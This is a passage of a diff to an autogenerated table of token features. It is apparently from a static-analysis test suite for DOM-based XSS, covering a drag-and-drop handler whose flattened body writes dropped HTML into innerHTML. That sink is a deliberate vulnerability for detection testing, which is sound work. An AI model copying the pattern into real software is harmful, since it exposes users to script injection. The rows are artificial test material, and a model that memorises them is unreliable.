includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainText | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainText | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:25 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:25 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:25 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:25 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:25 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:38 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:38 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:38 | e.dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:38 | e.dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:38 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:46 | e.dataT ... getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:46 | e.dataT ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:46 | e.dataT ... getData | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:46 | e.dataT ... getData | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:46 | e.dataT ... getData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | e.dataT ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | e.dataT ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | e.dataT ... plain') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | e.dataT ... plain') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | e.dataT ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | exceptional return of e.dataT ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | exceptional return of e.dataT ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | exceptional return of e.dataT ... plain') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | exceptional return of e.dataT ... plain') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:25:80:60 | exceptional return of e.dataT ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:27:80:38 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:27:80:38 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:27:80:38 | dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:27:80:38 | dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:27:80:38 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:40:80:46 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:40:80:46 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:40:80:46 | getData | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:40:80:46 | getData | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:40:80:46 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:48:80:59 | 'text/plain' | CalleeFlexibleAccessPath | e.dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:48:80:59 | 'text/plain' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:48:80:59 | 'text/plain' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13637,6 +101343,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:48:80:59 | 'text/plain' | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:48:80:59 | 'text/plain' | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:48:80:59 | 'text/plain' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:25 | /^https?:\\/\\//i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:25 | /^https?:\\/\\//i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:25 | /^https?:\\/\\//i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:25 | /^https?:\\/\\//i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:25 | /^https?:\\/\\//i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:30 | /^https?:\\/\\//i.test | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:30 | /^https?:\\/\\//i.test | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:30 | /^https?:\\/\\//i.test | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:30 | /^https?:\\/\\//i.test | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:30 | /^https?:\\/\\//i.test | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | /^https ... inText) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | /^https ... inText) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | /^https ... inText) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | /^https ... inText) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | /^https ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | exceptional return of /^https ... inText) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | exceptional return of /^https ... inText) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | exceptional return of /^https ... inText) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | exceptional return of /^https ... inText) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:11:82:41 | exceptional return of /^https ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:27:82:30 | test | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:27:82:30 | test | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:27:82:30 | test | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:27:82:30 | test | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:27:82:30 | test | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:32:82:40 | plainText | CalleeFlexibleAccessPath | ?.test | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:32:82:40 | plainText | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:32:82:40 | plainText | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13644,6 +101375,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:32:82:40 | plainText | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:32:82:40 | plainText | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:82:32:82:40 | plainText | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:17 | dropItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:17 | dropItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:17 | dropItems | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:17 | dropItems | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:17 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:21 | dropItems.add | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:21 | dropItems.add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:21 | dropItems.add | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:21 | dropItems.add | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:21 | dropItems.add | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | dropIte ... inText) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | dropIte ... inText) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | dropIte ... inText) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | dropIte ... inText) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | dropIte ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | exceptional return of dropIte ... inText) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | exceptional return of dropIte ... inText) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | exceptional return of dropIte ... inText) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | exceptional return of dropIte ... inText) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:9:83:32 | exceptional return of dropIte ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:19:83:21 | add | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:19:83:21 | add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:19:83:21 | add | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:19:83:21 | add | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:19:83:21 | add | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:23:83:31 | plainText | CalleeFlexibleAccessPath | dropItems.add | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:23:83:31 | plainText | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:23:83:31 | plainText | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13652,6 +101408,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:23:83:31 | plainText | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:23:83:31 | plainText | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:83:23:83:31 | plainText | receiverName | dropItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:20 | imageItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:20 | imageItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:20 | imageItems | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:20 | imageItems | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:20 | imageItems | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageIt ... pItems) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageIt ... pItems) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageIt ... pItems) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageIt ... pItems) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageIt ... pItems) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageItems | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageItems | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageItems | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:11:87:44 | imageItems | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:28 | Array | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:28 | Array | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:28 | Array | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:28 | Array | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:28 | Array | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:33 | Array.from | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:33 | Array.from | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:33 | Array.from | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:33 | Array.from | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:33 | Array.from | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | Array.f ... pItems) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | Array.f ... pItems) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | Array.f ... pItems) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | Array.f ... pItems) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | Array.f ... pItems) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:87:24:87:44 | exceptional return of Array.f ... pItems) | fileImports | | +| 